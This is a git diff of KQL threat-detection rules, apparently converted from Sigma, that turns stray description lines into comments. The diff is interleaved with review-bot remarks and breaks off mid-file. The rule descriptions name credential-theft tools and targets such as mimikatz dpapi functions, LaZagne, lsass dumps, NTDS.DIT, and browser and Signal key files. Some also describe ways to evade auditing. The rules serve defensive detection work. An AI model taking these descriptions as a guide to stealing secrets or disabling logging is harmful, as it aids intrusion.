diff --git a/KQL/rules/Credential Access/access_to_crypto_currency_wallets_by_uncommon_applications.kql b/KQL/rules/Credential Access/access_to_crypto_currency_wallets_by_uncommon_applications.kql
index eb039042..0d746a56 100644
--- a/KQL/rules/Credential Access/access_to_crypto_currency_wallets_by_uncommon_applications.kql
+++ b/KQL/rules/Credential Access/access_to_crypto_currency_wallets_by_uncommon_applications.kql
@@ -3,8 +3,7 @@
 // Date: 2024-07-29
 // Level: medium
 // Description: Detects file access requests to crypto currency files by uncommon processes.
-Could indicate potential attempt of crypto currency wallet stealing.
-
+// Could indicate potential attempt of crypto currency wallet stealing.
 // MITRE Tactic: Credential Access
 // Tags: attack.t1003, attack.credential-access
 // False Positives:
diff --git a/KQL/rules/Credential Access/access_to_windows_credential_history_file_by_uncommon_applications.kql b/KQL/rules/Credential Access/access_to_windows_credential_history_file_by_uncommon_applications.kql
index dd609165..8b6fa1cc 100644
--- a/KQL/rules/Credential Access/access_to_windows_credential_history_file_by_uncommon_applications.kql
+++ b/KQL/rules/Credential Access/access_to_windows_credential_history_file_by_uncommon_applications.kql
@@ -3,8 +3,7 @@
 // Date: 2022-10-17
 // Level: medium
 // Description: Detects file access requests to the Windows Credential History File by an uncommon application.
-This can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::credhist" function
-
+// This can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::credhist" function
 // MITRE Tactic: Credential Access
 // Tags: attack.credential-access, attack.t1555.004
diff --git a/KQL/rules/Credential Access/access_to_windows_dpapi_master_keys_by_uncommon_applications.kql b/KQL/rules/Credential Access/access_to_windows_dpapi_master_keys_by_uncommon_applications.kql
index 60770bc3..542529f5 100644
--- a/KQL/rules/Credential Access/access_to_windows_dpapi_master_keys_by_uncommon_applications.kql
+++ b/KQL/rules/Credential Access/access_to_windows_dpapi_master_keys_by_uncommon_applications.kql
@@ -3,8 +3,7 @@
 // Date: 2022-10-17
 // Level: medium
 // Description: Detects file access requests to the the Windows Data Protection API Master keys by an uncommon application.
-This can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::masterkey" function
-
+// This can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::masterkey" function
 // MITRE Tactic: Credential Access
 // Tags: attack.credential-access, attack.t1555.004
diff --git a/KQL/rules/Credential Access/credential_manager_access_by_uncommon_applications.kql b/KQL/rules/Credential Access/credential_manager_access_by_uncommon_applications.kql
index f1da9f32..42a3ab11 100644
--- a/KQL/rules/Credential Access/credential_manager_access_by_uncommon_applications.kql
+++ b/KQL/rules/Credential Access/credential_manager_access_by_uncommon_applications.kql
@@ -3,8 +3,7 @@
 // Date: 2022-10-11
 // Level: medium
 // Description: Detects suspicious processes based on name and location that access the windows credential manager and vault.
-Which can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::cred" function
-
+// Which can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::cred" function
 // MITRE Tactic: Credential Access
 // Tags: attack.t1003, attack.credential-access
 // False Positives:
diff --git a/KQL/rules/Credential Access/dpapi_backup_keys_and_certificate_export_activity_ioc.kql b/KQL/rules/Credential Access/dpapi_backup_keys_and_certificate_export_activity_ioc.kql
index b6f4121e..886fe412 100644
--- a/KQL/rules/Credential Access/dpapi_backup_keys_and_certificate_export_activity_ioc.kql
+++ b/KQL/rules/Credential Access/dpapi_backup_keys_and_certificate_export_activity_ioc.kql
@@ -3,7 +3,6 @@
 // Date: 2024-06-26
 // Level: high
 // Description: Detects file names with specific patterns seen generated and used by tools such as Mimikatz and DSInternals related to exported or stolen DPAPI backup keys and certificates.
-
 // MITRE Tactic: Credential Access
 // Tags: attack.credential-access, attack.t1555, attack.t1552.004
 // False Positives:
diff --git a/KQL/rules/Credential Access/enumeration_for_credentials_in_registry.kql b/KQL/rules/Credential Access/enumeration_for_credentials_in_registry.kql
index 8a7da21a..f5d364c4 100644
--- a/KQL/rules/Credential Access/enumeration_for_credentials_in_registry.kql
+++ b/KQL/rules/Credential Access/enumeration_for_credentials_in_registry.kql
@@ -3,9 +3,8 @@
 // Date: 2021-12-20
 // Level: medium
 // Description: Adversaries may search the Registry on compromised systems for insecurely stored credentials.
-The Windows Registry stores configuration information that can be used by the system or other programs.
-Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services
-
+// The Windows Registry stores configuration information that can be used by the system or other programs.
+// Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services
 // MITRE Tactic: Credential Access
 // Tags: attack.credential-access, attack.t1552.002
diff --git a/KQL/rules/Credential Access/file_access_of_signal_desktop_sensitive_data.kql b/KQL/rules/Credential Access/file_access_of_signal_desktop_sensitive_data.kql
index 392832e1..e7d9fa9d 100644
--- a/KQL/rules/Credential Access/file_access_of_signal_desktop_sensitive_data.kql
+++ b/KQL/rules/Credential Access/file_access_of_signal_desktop_sensitive_data.kql
@@ -3,10 +3,9 @@
 // Date: 2025-10-19
 // Level: medium
 // Description: Detects access to Signal Desktop's sensitive data files: db.sqlite and config.json.
-The db.sqlite file in Signal Desktop stores all locally saved messages in an encrypted SQLite database, while the config.json contains the decryption key needed to access that data.
-Since the key is stored in plain text, a threat actor who gains access to both files can decrypt and read sensitive messages without needing the users credentials.
-Currently the rule only covers the default Signal installation path in AppData\Roaming. Signal Portable installations may use different paths based on user configuration. Additional paths can be added to the selection as needed.
-
+// The db.sqlite file in Signal Desktop stores all locally saved messages in an encrypted SQLite database, while the config.json contains the decryption key needed to access that data.
+// Since the key is stored in plain text, a threat actor who gains access to both files can decrypt and read sensitive messages without needing the users credentials.
+// Currently the rule only covers the default Signal installation path in AppData\Roaming. Signal Portable installations may use different paths based on user configuration. Additional paths can be added to the selection as needed.
 // MITRE Tactic: Credential Access
 // Tags: attack.credential-access, attack.t1003
 // False Positives:
diff --git a/KQL/rules/Credential Access/hacktool_lazagne_execution.kql b/KQL/rules/Credential Access/hacktool_lazagne_execution.kql
index 39e5888b..a266e7c9 100644
--- a/KQL/rules/Credential Access/hacktool_lazagne_execution.kql
+++ b/KQL/rules/Credential Access/hacktool_lazagne_execution.kql
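Review bot: The third re-commented line ends with "Additional paths can be added to the selection as needed", and "selection" is vocabulary from the source rule format rather than anything a KQL file contains, so a maintainer of this query will not find the thing the comment tells them to extend. Since the query body is outside the hunk I cannot name the exact clause; rewording to `// ... Additional paths can be added to the path filter in the query below as needed.` points at the right place without depending on the source format. The same tuning hint might be worth a matching note in the False Positives key, which the hunk shows as empty.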
@@ -3,8 +3,7 @@
 // Date: 2024-06-24
 // Level: medium
 // Description: Detects the execution of the LaZagne. A utility used to retrieve multiple types of passwords stored on a local computer.
-LaZagne has been leveraged multiple times by threat actors in order to dump credentials.
-
+// LaZagne has been leveraged multiple times by threat actors in order to dump credentials.
 // MITRE Tactic: Credential Access
 // Tags: attack.credential-access
 // False Positives:
diff --git a/KQL/rules/Credential Access/hacktool_remotekrbrelay_execution.kql b/KQL/rules/Credential Access/hacktool_remotekrbrelay_execution.kql
index f71507b9..b6c71489 100644
--- a/KQL/rules/Credential Access/hacktool_remotekrbrelay_execution.kql
+++ b/KQL/rules/Credential Access/hacktool_remotekrbrelay_execution.kql
@@ -3,7 +3,6 @@
 // Date: 2024-06-27
 // Level: high
 // Description: Detects the use of RemoteKrbRelay, a Kerberos relaying tool via CommandLine flags and PE metadata.
-
 // MITRE Tactic: Credential Access
 // Tags: attack.credential-access, attack.t1558.003
 // False Positives:
diff --git a/KQL/rules/Credential Access/hacktool_winpwn_execution.kql b/KQL/rules/Credential Access/hacktool_winpwn_execution.kql
index 44f3e002..9d2c5df5 100644
--- a/KQL/rules/Credential Access/hacktool_winpwn_execution.kql
+++ b/KQL/rules/Credential Access/hacktool_winpwn_execution.kql
@@ -3,7 +3,6 @@
 // Date: 2023-12-04
 // Level: high
 // Description: Detects commandline keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation.
-
 // MITRE Tactic: Credential Access
 // Tags: attack.credential-access, attack.defense-evasion, attack.discovery, attack.execution, attack.privilege-escalation, attack.t1046, attack.t1082, attack.t1106, attack.t1518, attack.t1548.002, attack.t1552.001, attack.t1555, attack.t1555.003
diff --git a/KQL/rules/Credential Access/interesting_service_enumeration_via_sc_exe.kql b/KQL/rules/Credential Access/interesting_service_enumeration_via_sc_exe.kql
index f65cbe0d..187ef0d6 100644
--- a/KQL/rules/Credential Access/interesting_service_enumeration_via_sc_exe.kql
+++ b/KQL/rules/Credential Access/interesting_service_enumeration_via_sc_exe.kql
@@ -3,8 +3,7 @@
 // Date: 2024-02-12
 // Level: low
 // Description: Detects the enumeration and query of interesting and in some cases sensitive services on the system via "sc.exe".
-Attackers often try to enumerate the services currently running on a system in order to find different attack vectors.
-
+// Attackers often try to enumerate the services currently running on a system in order to find different attack vectors.
 // MITRE Tactic: Credential Access
 // Tags: attack.t1003, attack.credential-access
diff --git a/KQL/rules/Credential Access/loaded_module_enumeration_via_tasklist_exe.kql b/KQL/rules/Credential Access/loaded_module_enumeration_via_tasklist_exe.kql
index a84d7439..88b329e7 100644
--- a/KQL/rules/Credential Access/loaded_module_enumeration_via_tasklist_exe.kql
+++ b/KQL/rules/Credential Access/loaded_module_enumeration_via_tasklist_exe.kql
@@ -3,9 +3,8 @@
 // Date: 2024-02-12
 // Level: medium
 // Description: Detects the enumeration of a specific DLL or EXE being used by a binary via "tasklist.exe".
-This is often used by attackers in order to find the specific process identifier (PID) that is using the DLL in question.
-In order to dump the process memory or perform other nefarious actions.
-
+// This is often used by attackers in order to find the specific process identifier (PID) that is using the DLL in question.
+// In order to dump the process memory or perform other nefarious actions.
 // MITRE Tactic: Credential Access
 // Tags: attack.t1003, attack.credential-access
diff --git a/KQL/rules/Credential Access/lsass_dump_keyword_in_commandline.kql b/KQL/rules/Credential Access/lsass_dump_keyword_in_commandline.kql
index 32fc34d6..7a57b6a5 100644
--- a/KQL/rules/Credential Access/lsass_dump_keyword_in_commandline.kql
+++ b/KQL/rules/Credential Access/lsass_dump_keyword_in_commandline.kql
@@ -3,7 +3,6 @@
 // Date: 2019-10-24
 // Level: high
 // Description: Detects the presence of the keywords "lsass" and ".dmp" in the commandline, which could indicate a potential attempt to dump or create a dump of the lsass process.
-
 // MITRE Tactic: Credential Access
 // Tags: attack.credential-access, attack.t1003.001
 // False Positives:
diff --git a/KQL/rules/Credential Access/microsoft_teams_sensitive_file_access_by_uncommon_applications.kql b/KQL/rules/Credential Access/microsoft_teams_sensitive_file_access_by_uncommon_applications.kql
index 298e6b33..447f1f17 100644
--- a/KQL/rules/Credential Access/microsoft_teams_sensitive_file_access_by_uncommon_applications.kql
+++ b/KQL/rules/Credential Access/microsoft_teams_sensitive_file_access_by_uncommon_applications.kql
@@ -3,7 +3,6 @@
 // Date: 2024-07-22
 // Level: medium
 // Description: Detects file access attempts to sensitive Microsoft teams files (leveldb, cookies) by an uncommon process.
-
 // MITRE Tactic: Credential Access
 // Tags: attack.credential-access, attack.t1528
diff --git a/KQL/rules/Credential Access/new_generic_credentials_added_via_cmdkey_exe.kql b/KQL/rules/Credential Access/new_generic_credentials_added_via_cmdkey_exe.kql
index 285f26e8..7675a517 100644
--- a/KQL/rules/Credential Access/new_generic_credentials_added_via_cmdkey_exe.kql
+++ b/KQL/rules/Credential Access/new_generic_credentials_added_via_cmdkey_exe.kql
@@ -3,8 +3,7 @@
 // Date: 2023-02-03
 // Level: medium
 // Description: Detects usage of "cmdkey.exe" to add generic credentials.
-As an example, this can be used before connecting to an RDP session via command line interface.
-
+// As an example, this can be used before connecting to an RDP session via command line interface.
 // MITRE Tactic: Credential Access
 // Tags: attack.credential-access, attack.t1003.005
 // False Positives:
diff --git a/KQL/rules/Credential Access/permission_misconfiguration_reconnaissance_via_findstr_exe.kql b/KQL/rules/Credential Access/permission_misconfiguration_reconnaissance_via_findstr_exe.kql
index 0b259a6a..ea618367 100644
--- a/KQL/rules/Credential Access/permission_misconfiguration_reconnaissance_via_findstr_exe.kql
+++ b/KQL/rules/Credential Access/permission_misconfiguration_reconnaissance_via_findstr_exe.kql
@@ -3,8 +3,7 @@
 // Date: 2022-08-12
 // Level: medium
 // Description: Detects usage of findstr with the "EVERYONE" or "BUILTIN" keywords.
-This was seen being used in combination with "icacls" and other utilities to spot misconfigured files or folders permissions.
-
+// This was seen being used in combination with "icacls" and other utilities to spot misconfigured files or folders permissions.
 // MITRE Tactic: Credential Access
 // Tags: attack.credential-access, attack.t1552.006
diff --git a/KQL/rules/Credential Access/potential_browser_data_stealing.kql b/KQL/rules/Credential Access/potential_browser_data_stealing.kql
index 1303b99a..a619e777 100644
--- a/KQL/rules/Credential Access/potential_browser_data_stealing.kql
+++ b/KQL/rules/Credential Access/potential_browser_data_stealing.kql
@@ -3,9 +3,8 @@
 // Date: 2022-12-23
 // Level: medium
 // Description: Adversaries may acquire credentials from web browsers by reading files specific to the target browser.
-Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future.
-Web browsers typically store the credentials in an encrypted format within a credential store.
-
+// Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future.
+// Web browsers typically store the credentials in an encrypted format within a credential store.
 // MITRE Tactic: Credential Access
 // Tags: attack.credential-access, attack.t1555.003
diff --git a/KQL/rules/Credential Access/potential_network_sniffing_activity_using_network_tools.kql b/KQL/rules/Credential Access/potential_network_sniffing_activity_using_network_tools.kql
index f652df5b..716ca4a5 100644
--- a/KQL/rules/Credential Access/potential_network_sniffing_activity_using_network_tools.kql
+++ b/KQL/rules/Credential Access/potential_network_sniffing_activity_using_network_tools.kql
@@ -3,9 +3,8 @@
 // Date: 2019-10-21
 // Level: medium
 // Description: Detects potential network sniffing via use of network tools such as "tshark", "windump".
-Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection.
-An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
-
+// Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection.
+// An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
 // MITRE Tactic: Credential Access
 // Tags: attack.credential-access, attack.discovery, attack.t1040
 // False Positives:
diff --git a/KQL/rules/Credential Access/potential_powershell_console_history_access_attempt_via_history_file.kql b/KQL/rules/Credential Access/potential_powershell_console_history_access_attempt_via_history_file.kql
index 4f3ce6af..3a9cb5be 100644
--- a/KQL/rules/Credential Access/potential_powershell_console_history_access_attempt_via_history_file.kql
+++ b/KQL/rules/Credential Access/potential_powershell_console_history_access_attempt_via_history_file.kql
@@ -3,8 +3,7 @@
 // Date: 2025-04-03
 // Level: medium
 // Description: Detects potential access attempts to the PowerShell console history directly via history file (ConsoleHost_history.txt).
-This can give access to plaintext passwords used in PowerShell commands or used for general reconnaissance.
-
+// This can give access to plaintext passwords used in PowerShell commands or used for general reconnaissance.
 // MITRE Tactic: Credential Access
 // Tags: attack.credential-access, attack.t1552.001
 // False Positives:
diff --git a/KQL/rules/Credential Access/potential_windows_defender_av_bypass_via_dump64_exe_rename.kql b/KQL/rules/Credential Access/potential_windows_defender_av_bypass_via_dump64_exe_rename.kql
index af3aa6ba..40610060 100644
--- a/KQL/rules/Credential Access/potential_windows_defender_av_bypass_via_dump64_exe_rename.kql
+++ b/KQL/rules/Credential Access/potential_windows_defender_av_bypass_via_dump64_exe_rename.kql
@@ -3,8 +3,7 @@
 // Date: 2021-11-26
 // Level: high
 // Description: Detects when a user is potentially trying to bypass the Windows Defender AV by renaming a tool to dump64.exe and placing it in the Visual Studio folder.
-Currently the rule is covering only usage of procdump but other utilities can be added in order to increase coverage.
-
+// Currently the rule is covering only usage of procdump but other utilities can be added in order to increase coverage.
 // MITRE Tactic: Credential Access
 // Tags: attack.credential-access, attack.t1003.001
diff --git a/KQL/rules/Credential Access/potentially_suspicious_command_targeting_teams_sensitive_files.kql b/KQL/rules/Credential Access/potentially_suspicious_command_targeting_teams_sensitive_files.kql
index f2753d96..785fe69a 100644
--- a/KQL/rules/Credential Access/potentially_suspicious_command_targeting_teams_sensitive_files.kql
+++ b/KQL/rules/Credential Access/potentially_suspicious_command_targeting_teams_sensitive_files.kql
@@ -3,8 +3,7 @@
 // Date: 2022-09-16
 // Level: medium
 // Description: Detects a commandline containing references to the Microsoft Teams database or cookies files from a process other than Teams.
-The database might contain authentication tokens and other sensitive information about the logged in accounts.
-
+// The database might contain authentication tokens and other sensitive information about the logged in accounts.
 // MITRE Tactic: Credential Access
 // Tags: attack.credential-access, attack.t1528
diff --git a/KQL/rules/Credential Access/potentially_suspicious_eventlog_recon_activity_using_log_query_utilities.kql b/KQL/rules/Credential Access/potentially_suspicious_eventlog_recon_activity_using_log_query_utilities.kql
index 3bec20e7..2f1b5339 100644
--- a/KQL/rules/Credential Access/potentially_suspicious_eventlog_recon_activity_using_log_query_utilities.kql
+++ b/KQL/rules/Credential Access/potentially_suspicious_eventlog_recon_activity_using_log_query_utilities.kql
@@ -3,8 +3,7 @@
 // Date: 2022-09-09
 // Level: medium
 // Description: Detects execution of different log query utilities and commands to search and dump the content of specific event logs or look for specific event IDs.
-This technique is used by threat actors in order to extract sensitive information from events logs such as usernames, IP addresses, hostnames, etc.
-
+// This technique is used by threat actors in order to extract sensitive information from events logs such as usernames, IP addresses, hostnames, etc.
 // MITRE Tactic: Credential Access
 // Tags: attack.credential-access, attack.discovery, attack.t1552
 // False Positives:
diff --git a/KQL/rules/Credential Access/potentially_suspicious_jwt_token_search_via_cli.kql b/KQL/rules/Credential Access/potentially_suspicious_jwt_token_search_via_cli.kql
index 1d8585e5..5a664c76 100644
--- a/KQL/rules/Credential Access/potentially_suspicious_jwt_token_search_via_cli.kql
+++ b/KQL/rules/Credential Access/potentially_suspicious_jwt_token_search_via_cli.kql
@@ -3,9 +3,8 @@
 // Date: 2022-10-25
 // Level: medium
 // Description: Detects potentially suspicious search for JWT tokens via CLI by looking for the string "eyJ0eX" or "eyJhbG".
-JWT tokens are often used for access-tokens across various applications and services like Microsoft 365, Azure, AWS, Google Cloud, and others.
-Threat actors may search for these tokens to steal them for lateral movement or privilege escalation.
-
+// JWT tokens are often used for access-tokens across various applications and services like Microsoft 365, Azure, AWS, Google Cloud, and others.
+// Threat actors may search for these tokens to steal them for lateral movement or privilege escalation.
 // MITRE Tactic: Credential Access
 // Tags: attack.credential-access, attack.t1528, attack.t1552.001
diff --git a/KQL/rules/Credential Access/registry_export_of_third_party_credentials.kql b/KQL/rules/Credential Access/registry_export_of_third_party_credentials.kql
index a14e467d..e4df5719 100644
--- a/KQL/rules/Credential Access/registry_export_of_third_party_credentials.kql
+++ b/KQL/rules/Credential Access/registry_export_of_third_party_credentials.kql
@@ -3,8 +3,7 @@
 // Date: 2025-05-22
 // Level: high
 // Description: Detects the use of reg.exe to export registry paths associated with third-party credentials.
-Credential stealers have been known to use this technique to extract sensitive information from the registry.
-
+// Credential stealers have been known to use this technique to extract sensitive information from the registry.
 // MITRE Tactic: Credential Access
 // Tags: attack.credential-access, attack.t1552.002
diff --git a/KQL/rules/Credential Access/sensitive_file_dump_via_wbadmin_exe.kql b/KQL/rules/Credential Access/sensitive_file_dump_via_wbadmin_exe.kql
index 6938ed3d..46c9bc5e 100644
--- a/KQL/rules/Credential Access/sensitive_file_dump_via_wbadmin_exe.kql
+++ b/KQL/rules/Credential Access/sensitive_file_dump_via_wbadmin_exe.kql
@@ -3,8 +3,7 @@
 // Date: 2024-05-10
 // Level: high
 // Description: Detects the dump of highly sensitive files such as "NTDS.DIT" and "SECURITY" hive.
-Attackers can leverage the "wbadmin" utility in order to dump sensitive files that might contain credential or sensitive information.
-
+// Attackers can leverage the "wbadmin" utility in order to dump sensitive files that might contain credential or sensitive information.
 // MITRE Tactic: Credential Access
 // Tags: attack.credential-access, attack.t1003.003
 // False Positives:
diff --git a/KQL/rules/Credential Access/sensitive_file_recovery_from_backup_via_wbadmin_exe.kql b/KQL/rules/Credential Access/sensitive_file_recovery_from_backup_via_wbadmin_exe.kql
index 4a8e9c75..484f1b7d 100644
--- a/KQL/rules/Credential Access/sensitive_file_recovery_from_backup_via_wbadmin_exe.kql
+++ b/KQL/rules/Credential Access/sensitive_file_recovery_from_backup_via_wbadmin_exe.kql
@@ -3,8 +3,7 @@
 // Date: 2024-05-10
 // Level: high
 // Description: Detects the dump of highly sensitive files such as "NTDS.DIT" and "SECURITY" hive.
-Attackers can leverage the "wbadmin" utility in order to dump sensitive files that might contain credential or sensitive information.
-
+// Attackers can leverage the "wbadmin" utility in order to dump sensitive files that might contain credential or sensitive information.
 // MITRE Tactic: Credential Access
 // Tags: attack.credential-access, attack.t1003.003
diff --git a/KQL/rules/Credential Access/suspicious_file_access_to_browser_credential_storage.kql b/KQL/rules/Credential Access/suspicious_file_access_to_browser_credential_storage.kql
index 1a903487..8933c2c7 100644
--- a/KQL/rules/Credential Access/suspicious_file_access_to_browser_credential_storage.kql
+++ b/KQL/rules/Credential Access/suspicious_file_access_to_browser_credential_storage.kql
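Review bot: The new header of sensitive_file_recovery_from_backup_via_wbadmin_exe.kql is a verbatim copy of the sensitive_file_dump_via_wbadmin_exe.kql hunk on this same line — `// Description: Detects the dump of highly sensitive files such as "NTDS.DIT" and "SECURITY" hive.` plus the `// Attackers can leverage the "wbadmin" utility in order to dump sensitive files ...` continuation — so the recovery rule's metadata describes a dump rather than the recovery-from-backup behaviour its filename names. An analyst triaging an alert from the recovery rule would be told it fired on a dump, which hurts triage and makes the two rules indistinguishable in any console that shows only the description. Assuming the query body, which is outside this hunk, matches a wbadmin recovery invocation, the first line should read along the lines of `// Description: Detects the recovery of highly sensitive files such as "NTDS.DIT" and "SECURITY" hive from a backup via "wbadmin".`, with the continuation line reworded to match; confirm against the query before changing it.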
@@ -3,9 +3,8 @@
 // Date: 2025-05-22
 // Level: low
 // Description: Detects file access to browser credential storage paths by non-browser processes, which may indicate credential access attempts.
-Adversaries may attempt to access browser credential storage to extract sensitive information such as usernames and passwords or cookies.
-This behavior is often commonly observed in credential stealing malware.
-
+// Adversaries may attempt to access browser credential storage to extract sensitive information such as usernames and passwords or cookies.
+// This behavior is often commonly observed in credential stealing malware.
 // MITRE Tactic: Credential Access
 // Tags: attack.credential-access, attack.t1555.003, attack.discovery, attack.t1217
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/_rdp_file_created_by_uncommon_application.kql b/KQL/rules/Defense Evasion/_rdp_file_created_by_uncommon_application.kql
index fae1af62..a4241782 100644
--- a/KQL/rules/Defense Evasion/_rdp_file_created_by_uncommon_application.kql
+++ b/KQL/rules/Defense Evasion/_rdp_file_created_by_uncommon_application.kql
@@ -3,7 +3,6 @@
 // Date: 2023-04-18
 // Level: high
 // Description: Detects creation of a file with an ".rdp" extension by an application that doesn't commonly create such files.
-
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion
diff --git a/KQL/rules/Defense Evasion/add_insecure_download_source_to_winget.kql b/KQL/rules/Defense Evasion/add_insecure_download_source_to_winget.kql
index a3af7520..247df255 100644
--- a/KQL/rules/Defense Evasion/add_insecure_download_source_to_winget.kql
+++ b/KQL/rules/Defense Evasion/add_insecure_download_source_to_winget.kql
@@ -3,8 +3,7 @@
 // Date: 2023-04-17
 // Level: high
 // Description: Detects usage of winget to add a new insecure (http) download source.
-Winget will not allow the addition of insecure sources, hence this could indicate potential suspicious activity (or typos)
-
+// Winget will not allow the addition of insecure sources, hence this could indicate potential suspicious activity (or typos)
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.execution, attack.t1059
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/antivirus_filter_driver_disallowed_on_dev_drive_registry.kql b/KQL/rules/Defense Evasion/antivirus_filter_driver_disallowed_on_dev_drive_registry.kql
index b2d5e948..f0cb21a5 100644
--- a/KQL/rules/Defense Evasion/antivirus_filter_driver_disallowed_on_dev_drive_registry.kql
+++ b/KQL/rules/Defense Evasion/antivirus_filter_driver_disallowed_on_dev_drive_registry.kql
@@ -3,7 +3,6 @@
 // Date: 2023-11-05
 // Level: high
 // Description: Detects activity that indicates a user disabling the ability for Antivirus mini filter to inspect a "Dev Drive".
-
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1562.001
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/arbitrary_file_download_via_squirrel_exe.kql b/KQL/rules/Defense Evasion/arbitrary_file_download_via_squirrel_exe.kql
index 381c132f..8730c452 100644
--- a/KQL/rules/Defense Evasion/arbitrary_file_download_via_squirrel_exe.kql
+++ b/KQL/rules/Defense Evasion/arbitrary_file_download_via_squirrel_exe.kql
@@ -3,7 +3,6 @@
 // Date: 2022-06-09
 // Level: medium
 // Description: Detects the usage of the "Squirrel.exe" to download arbitrary files. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.)
-
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.execution, attack.t1218
 // False Positives:
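Review bot: The converted continuation line in add_insecure_download_source_to_winget.kql, `// Winget will not allow the addition of insecure sources, hence this could indicate potential suspicious activity (or typos)`, is carried over without terminal punctuation, while every other description line in these hunks ends in a period. The same carry-over happens in the dll_sideloading_of_shellchromeapi_dll.kql hunk (`... using this parameter`) and the dynamic_csharp_compile_artefact.kql hunk (`... unpack a payload for execution`). Since the commit is already rewriting these lines into `//` comments, it is the natural place to make them consistent by appending the missing period to each of the three.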
diff --git a/KQL/rules/Defense Evasion/audit_policy_tampering_via_auditpol.kql b/KQL/rules/Defense Evasion/audit_policy_tampering_via_auditpol.kql
index 7ffb880d..4fc52334 100644
--- a/KQL/rules/Defense Evasion/audit_policy_tampering_via_auditpol.kql
+++ b/KQL/rules/Defense Evasion/audit_policy_tampering_via_auditpol.kql
@@ -3,8 +3,7 @@
 // Date: 2021-02-02
 // Level: high
 // Description: Threat actors can use auditpol binary to change audit policy configuration to impair detection capability.
-This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.
-
+// This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1562.002
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/audit_policy_tampering_via_nt_resource_kit_auditpol.kql b/KQL/rules/Defense Evasion/audit_policy_tampering_via_nt_resource_kit_auditpol.kql
index 12fe1441..c0c1dfd3 100644
--- a/KQL/rules/Defense Evasion/audit_policy_tampering_via_nt_resource_kit_auditpol.kql
+++ b/KQL/rules/Defense Evasion/audit_policy_tampering_via_nt_resource_kit_auditpol.kql
@@ -3,8 +3,7 @@
 // Date: 2021-12-18
 // Level: high
 // Description: Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability.
-This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.
-
+// This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1562.002
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/audit_rules_deleted_via_auditctl.kql b/KQL/rules/Defense Evasion/audit_rules_deleted_via_auditctl.kql
index 954d84b1..0cfe2afe 100644
--- a/KQL/rules/Defense Evasion/audit_rules_deleted_via_auditctl.kql
+++ b/KQL/rules/Defense Evasion/audit_rules_deleted_via_auditctl.kql
@@ -3,9 +3,8 @@
 // Date: 2025-10-17
 // Level: high
 // Description: Detects the execution of 'auditctl' with the '-D' command line parameter, which deletes all configured audit rules and watches on Linux systems.
-This technique is commonly used by attackers to disable audit logging and cover their tracks by removing monitoring capabilities.
-Removal of audit rules can significantly impair detection of malicious activities on the affected system.
-
+// This technique is commonly used by attackers to disable audit logging and cover their tracks by removing monitoring capabilities.
+// Removal of audit rules can significantly impair detection of malicious activities on the affected system.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1562.012
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/baaupdate_exe_suspicious_dll_load.kql b/KQL/rules/Defense Evasion/baaupdate_exe_suspicious_dll_load.kql
index da220433..58287020 100644
--- a/KQL/rules/Defense Evasion/baaupdate_exe_suspicious_dll_load.kql
+++ b/KQL/rules/Defense Evasion/baaupdate_exe_suspicious_dll_load.kql
@@ -3,9 +3,8 @@
 // Date: 2025-10-18
 // Level: high
 // Description: Detects BitLocker Access Agent Update Utility (baaupdate.exe) loading DLLs from suspicious locations that are publicly writable which could indicate an attempt to lateral movement via BitLocker DCOM & COM Hijacking.
-This technique abuses COM Classes configured as INTERACTIVE USER to spawn processes in the context of the logged-on user's session. Specifically, it targets the BDEUILauncher Class (CLSID ab93b6f1-be76-4185-a488-a9001b105b94)
-which can launch BaaUpdate.exe, which is vulnerable to COM Hijacking when started with input parameters. This allows attackers to execute code in the user's context without needing to steal credentials or use additional techniques to compromise the account.
-
+// This technique abuses COM Classes configured as INTERACTIVE USER to spawn processes in the context of the logged-on user's session. Specifically, it targets the BDEUILauncher Class (CLSID ab93b6f1-be76-4185-a488-a9001b105b94)
+// which can launch BaaUpdate.exe, which is vulnerable to COM Hijacking when started with input parameters. This allows attackers to execute code in the user's context without needing to steal credentials or use additional techniques to compromise the account.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1218, attack.lateral-movement, attack.t1021.003
diff --git a/KQL/rules/Defense Evasion/bad_opsec_defaults_sacrificial_processes_with_improper_arguments.kql b/KQL/rules/Defense Evasion/bad_opsec_defaults_sacrificial_processes_with_improper_arguments.kql
index 69290c62..f69d45f0 100644
--- a/KQL/rules/Defense Evasion/bad_opsec_defaults_sacrificial_processes_with_improper_arguments.kql
